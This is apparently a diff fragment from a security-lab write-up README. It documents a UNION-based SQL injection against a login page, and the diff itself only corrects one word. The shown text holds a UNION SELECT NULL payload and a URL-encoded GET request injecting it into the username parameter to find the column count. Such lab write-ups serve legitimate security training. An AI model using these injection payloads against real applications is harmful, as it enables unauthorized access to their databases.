shashihacks/OSCP-PWK/Security Insider Lab-2/README.md

         ' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
     ```

-    - The above queries are concatenated to the username parameter(shown below) and send one by one, all the payloads resulted in login failures and error messages, except when `SELECT` followed by 8 `NULL`, thus results the table has 8 columns.
+    - The above queries are concatenated to the username parameter(shown below) and sent one by one, all the payloads resulted in login failures and error messages, except when `SELECT` followed by 8 `NULL`, thus results the table has 8 columns.
     ```php
     GET /htdocs/login.php?username=alex%27%20UNION%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23&password=test123
     ```